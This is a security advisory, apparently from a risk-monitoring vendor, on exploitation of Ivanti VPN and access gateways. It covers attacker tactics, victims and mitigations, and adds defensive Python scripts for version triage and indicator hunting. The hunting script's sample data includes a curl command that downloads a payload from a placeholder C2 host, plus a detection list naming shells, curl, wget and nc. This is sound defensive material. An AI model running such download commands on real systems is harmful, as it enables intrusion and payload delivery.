
Ivanti Connect Secure, Policy Secure, and Neurons Zero-Day Exploitation Surge: CVE-2025-0282 and CVE-2025-0283 Threat Analysis and Mitigation


Executive Summary

Since July 2025, exploitation of zero-day vulnerabilities in Ivanti products has surged, with sophisticated threat actors targeting Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA Gateways. These attacks leverage previously unknown flaws to achieve remote code execution, persistent access, and lateral movement within enterprise environments. The campaign has been traced to multiple high-profile incidents across Europe, affecting critical sectors such as finance, telecommunications, healthcare, and government. Attackers have deployed web shells, cryptocurrency miners, and advanced malware, resulting in data exfiltration, operational disruption, and significant risk to organizational integrity. This advisory provides a comprehensive technical analysis, threat actor profiling, exploitation details, victimology, and actionable mitigation strategies to help organizations defend against these ongoing threats.

Threat Actor Profile

The exploitation wave against Ivanti products exhibits hallmarks of advanced persistent threat (APT) operations, though no single group has been definitively attributed. The attackers demonstrate a high degree of technical sophistication, leveraging custom exploit chains, obfuscated payloads, and multi-stage intrusion tactics. Their operational tempo and targeting patterns suggest either state-sponsored actors or highly organized cybercriminal syndicates. The campaign’s focus on critical infrastructure and regulated industries, combined with the use of advanced evasion techniques, aligns with the TTPs (Tactics, Techniques, and Procedures) cataloged in the MITRE ATT&CK framework, specifically techniques such as Exploit Public-Facing Application (T1190), Command and Scripting Interpreter (T1059), and Ingress Tool Transfer (T1105). The attackers have demonstrated adaptability, rapidly shifting payloads and infrastructure in response to public disclosures and vendor mitigations.

Technical Analysis of Malware/TTPs

The primary vulnerabilities exploited are CVE-2025-0282 and CVE-2025-0283. CVE-2025-0282 is a stack-based buffer overflow present in Ivanti Connect Secure versions prior to 22.7R2.5, Ivanti Policy Secure before 22.7R1.2, and Ivanti Neurons for ZTA Gateways before 22.7R2.3. Successful exploitation allows remote, unauthenticated attackers to execute arbitrary code with system-level privileges. Attackers initiate exploitation by sending specially crafted HTTP requests to exposed management interfaces, triggering the overflow and gaining shell access.

Post-exploitation, adversaries deploy web shells (such as cmd.jsp and shell.aspx) into web-accessible directories, enabling persistent remote command execution. In several observed cases, attackers have installed cryptocurrency mining software, leveraging compromised infrastructure for illicit financial gain. Lateral movement is facilitated through credential harvesting and the use of valid accounts (T1078), often by extracting cached credentials or leveraging session tokens from memory.

Network traffic analysis reveals outbound connections to known command-and-control (C2) servers and cryptocurrency mining pools. Attackers employ encrypted channels and domain fronting to evade detection. Internal reconnaissance is conducted using built-in system utilities and custom scripts, mapping network shares, enumerating user accounts, and probing for additional vulnerable assets. Persistence mechanisms include scheduled tasks, service modifications, and the deployment of rootkits or kernel-level drivers in advanced cases.

The malware ecosystem observed in these campaigns is modular, with initial access payloads downloading secondary stages from attacker-controlled infrastructure. These stages include credential dumpers, privilege escalation tools, and data exfiltration utilities. The attackers demonstrate a preference for "living off the land" techniques, minimizing the use of custom binaries to reduce their forensic footprint.

Exploitation in the Wild

The first confirmed exploitation of these Ivanti zero-days occurred in July 2025, with a marked increase in activity through late 2025 and into 2026. Public and private sector organizations across Germany, France, the United Kingdom, the Netherlands, Italy, and Spain have reported incidents. Attackers have demonstrated a high degree of automation, scanning for vulnerable instances and deploying exploits at scale. In several cases, exploitation was detected only after significant dwell time, with attackers maintaining access for weeks before discovery.

Incident response investigations have uncovered forensic artifacts such as unauthorized web shell files, anomalous process trees originating from Ivanti services, and evidence of internal network scanning. Outbound traffic to cryptocurrency mining pools and C2 infrastructure has been a consistent indicator of compromise. The exploitation campaigns have been opportunistic, with attackers targeting any exposed and unpatched Ivanti instance, regardless of organizational size or sector.

Victimology and Targeting

The victim profile is broad, encompassing enterprises in finance, telecommunications, healthcare, and government. The common denominator among victims is the deployment of vulnerable Ivanti products with internet-exposed management interfaces. Attackers have shown a preference for organizations with large user populations and critical business functions, maximizing the potential impact of compromise.

Geographically, the campaign has concentrated on Western and Central Europe, though isolated incidents have been reported in North America and Asia. The targeting does not appear to be ideologically motivated; rather, it is driven by the opportunity for financial gain, data theft, and potential access to sensitive infrastructure. In several high-profile cases, attackers have exfiltrated sensitive data, including authentication credentials, configuration files, and internal documentation, which may be leveraged for future attacks or sold on underground forums.

Mitigation and Countermeasures

Immediate mitigation requires patching all affected Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA Gateways to the latest available versions (22.7R2.5, 22.7R1.2, and 22.7R2.3 or later, respectively). Organizations must audit their perimeter for exposed management interfaces and restrict access to trusted administrative networks using network segmentation and firewall rules. Enforcing multi-factor authentication (MFA) for all administrative access to Ivanti products is critical to reducing the risk of credential-based attacks.
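The first step in the mitigation above is knowing which appliances are still below the fixed releases named in this advisory. The following script is an added example written for this page; it is not code from Rescana or from Ivanti. It assumes that Ivanti version strings follow the pattern <major>.<minor>R<release>[.<patch>] with an optional "(build N)" suffix (e.g. "22.7R2.5"), which is a working assumption of the example, and the hostnames and versions in the sample inventory are constructed.

```python
import re
from typing import List, Tuple

# First fixed releases, as stated in the advisory (product -> version).
FIXED_VERSIONS = {
    "Ivanti Connect Secure": "22.7R2.5",
    "Ivanti Policy Secure": "22.7R1.2",
    "Ivanti Neurons for ZTA Gateways": "22.7R2.3",
}

# Assumption: version strings look like "22.7R2.5" or "22.7R2.5 (build 1234)".
# The trailing patch component may be absent ("22.6R1"), in which case it is 0.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)R(\d+)(?:\.(\d+))?(?:\s*\(build\s+\d+\))?$")


def parse_version(version: str) -> Tuple[int, int, int, int]:
    """Turn an Ivanti-style version string into a comparable tuple."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, release, patch = m.groups()
    return (int(major), int(minor), int(release), int(patch or 0))


def is_affected(product: str, version: str) -> bool:
    """True when `version` is strictly below the first fixed release for `product`."""
    fixed = FIXED_VERSIONS[product]          # KeyError for products not in scope
    return parse_version(version) < parse_version(fixed)


def triage(inventory: List[Tuple[str, str, str]]) -> List[Tuple[str, str, str]]:
    """Return the (host, product, version) entries that still need patching."""
    return [entry for entry in inventory if is_affected(entry[1], entry[2])]


# Constructed sample inventory: hostnames and versions are made up for illustration.
SAMPLE_INVENTORY = [
    ("vpn-01.example.internal", "Ivanti Connect Secure", "22.7R2.4"),
    ("vpn-02.example.internal", "Ivanti Connect Secure", "22.7R2.5 (build 1234)"),
    ("nac-01.example.internal", "Ivanti Policy Secure", "22.7R1.1"),
    ("zta-01.example.internal", "Ivanti Neurons for ZTA Gateways", "22.7R2.3"),
    ("zta-02.example.internal", "Ivanti Neurons for ZTA Gateways", "22.6R1"),
]

if __name__ == "__main__":
    for host, product, version in triage(SAMPLE_INVENTORY):
        print(f"{host}: {product} {version} is below {FIXED_VERSIONS[product]}, patch required")
```

Comparing parsed tuples rather than raw strings matters: a plain string comparison would rank "22.7R2.10" below "22.7R2.5". Feed the function the version as reported by each appliance's administrative interface or your asset inventory.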

Continuous monitoring for indicators of compromise is essential. Security teams should review web server directories for unauthorized files, analyze process trees for anomalous activity originating from Ivanti services, and inspect outbound network traffic for connections to known C2 domains and cryptocurrency mining pools. Implementing endpoint detection and response (EDR) solutions with behavioral analytics can aid in the early detection of post-exploitation activity.
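The three checks in the paragraph above (unauthorized files in web directories, anomalous process trees rooted in Ivanti services, and outbound connections to C2 or mining infrastructure) correspond directly to the post-exploitation artifacts described in the technical analysis. The script below is an added example written for this page, not code from Rescana or Ivanti. Everything in it is constructed: the baseline and file listing, the process table, the flow records, and the indicator values (which use the reserved ".invalid" TLD as placeholders, not real IoCs). The assumption that the appliance's web front-end runs as a process named "web", and the egress allowlist, are operator-supplied settings to be replaced with what is observed on the real system.

```python
"""Hunting for the post-exploitation artifacts described in this advisory.

Added example; all data is constructed and all indicator values are placeholders.
"""
import os
from dataclasses import dataclass
from typing import Dict, Iterable, List

# --- 1. Unauthorized files in web-accessible directories ---------------------
# Assumption: a baseline (path -> sha256) of the files that belong in the web
# roots exists, taken from a known-good image of the appliance.
SCRIPT_EXTENSIONS = {".jsp", ".jspx", ".aspx", ".ashx", ".php"}

def find_unexpected_files(listing: Dict[str, str], baseline: Dict[str, str]) -> List[dict]:
    """Flag files missing from the baseline or whose hash changed."""
    findings = []
    for path, digest in listing.items():
        expected = baseline.get(path)
        if expected is None:
            ext = os.path.splitext(path)[1].lower()
            findings.append({"path": path, "reason": "not in baseline",
                             "severity": "high" if ext in SCRIPT_EXTENSIONS else "medium"})
        elif expected != digest:
            findings.append({"path": path, "reason": "hash mismatch", "severity": "high"})
    return findings

# --- 2. Anomalous process trees rooted in the Ivanti web service -------------
@dataclass(frozen=True)
class Process:
    pid: int
    ppid: int
    name: str
    cmdline: str

# Assumption: the web front-end process is named "web"; adjust to the real system.
IVANTI_SERVICE_NAMES = {"web"}
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "python", "python3", "perl", "curl", "wget", "nc"}

def find_anomalous_children(processes: Iterable[Process]) -> List[Process]:
    """Return interpreters/downloaders that descend (at any depth) from a service process."""
    by_pid = {p.pid: p for p in processes}
    flagged = []
    for p in by_pid.values():
        if p.name not in SUSPICIOUS_CHILDREN:
            continue
        seen, ancestor = set(), by_pid.get(p.ppid)
        while ancestor is not None and ancestor.pid not in seen:  # guard against ppid cycles
            if ancestor.name in IVANTI_SERVICE_NAMES:
                flagged.append(p)
                break
            seen.add(ancestor.pid)
            ancestor = by_pid.get(ancestor.ppid)
    return sorted(flagged, key=lambda p: p.pid)

# --- 3. Outbound connections to C2 hosts and mining pools --------------------
@dataclass(frozen=True)
class Flow:
    src: str
    dst_host: str
    dst_port: int

# Placeholders standing in for a threat-intel feed and for the short list of
# destinations the appliance legitimately needs (updates, licensing, IdP).
KNOWN_BAD_HOSTS = {"c2-placeholder.invalid", "pool-placeholder.invalid"}
EXPECTED_DESTINATIONS = {"updates.example.internal", "idp.example.internal"}

def find_suspicious_flows(flows: Iterable[Flow]) -> List[dict]:
    """Known-bad destinations are high severity; anything else off the allowlist is medium."""
    findings = []
    for f in flows:
        if f.dst_host in KNOWN_BAD_HOSTS:
            findings.append({"flow": f, "severity": "high", "reason": "known C2/mining host"})
        elif f.dst_host not in EXPECTED_DESTINATIONS:
            findings.append({"flow": f, "severity": "medium", "reason": "not on egress allowlist"})
    return findings

# --- Constructed sample data -------------------------------------------------
BASELINE = {"/var/www/index.jsp": "aaa111", "/var/www/logo.png": "bbb222"}
LISTING = {"/var/www/index.jsp": "aaa111", "/var/www/logo.png": "bbb222",
           "/var/www/cmd.jsp": "ccc333", "/var/www/notes.txt": "ddd444"}
PROCESSES = [
    Process(1, 0, "init", "init"),
    Process(100, 1, "web", "web"),
    Process(101, 1, "sshd", "sshd"),
    Process(200, 100, "sh", "sh -c 'curl -o /tmp/m http://c2-placeholder.invalid/m'"),
    Process(201, 200, "curl", "curl -o /tmp/m http://c2-placeholder.invalid/m"),
    Process(300, 101, "bash", "-bash"),  # an administrator's SSH shell: not flagged
]
FLOWS = [
    Flow("10.0.0.5", "updates.example.internal", 443),
    Flow("10.0.0.5", "c2-placeholder.invalid", 443),
    Flow("10.0.0.5", "pool-placeholder.invalid", 3333),
    Flow("10.0.0.5", "unknown-host.example.internal", 8080),
]

def hunt() -> dict:
    return {"files": find_unexpected_files(LISTING, BASELINE),
            "processes": find_anomalous_children(PROCESSES),
            "flows": find_suspicious_flows(FLOWS)}

if __name__ == "__main__":
    for category, items in hunt().items():
        print(category)
        for item in items:
            print("  ", item)
```

The process check walks the whole ancestor chain rather than only the immediate parent, so a chain such as web -> sh -> curl is caught at both levels, while an administrator's shell under sshd is not. The egress check deliberately treats "not on the allowlist" as a finding in its own right: an appliance of this kind needs only a handful of outbound destinations, and the advisory's observation that C2 traffic is encrypted means that payload inspection alone cannot be relied upon.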

Incident response plans should be updated to include specific playbooks for Ivanti exploitation scenarios. Regular backups of configuration data and critical assets must be maintained and tested for integrity. Organizations are encouraged to conduct proactive threat hunting, focusing on the TTPs outlined in this advisory, and to engage with trusted threat intelligence providers for timely updates on evolving attacker methodologies.

About Rescana

Rescana empowers organizations to proactively manage third-party risk and strengthen their cybersecurity posture through our advanced TPRM platform. Our solution delivers continuous monitoring, automated risk assessments, and actionable intelligence, enabling security teams to identify, prioritize, and mitigate threats across their digital supply chain. By leveraging cutting-edge analytics and real-time threat intelligence, Rescana helps organizations stay ahead of emerging risks and regulatory requirements. For more information or to discuss how we can support your security objectives, we are happy to answer questions at ops@rescana.com.
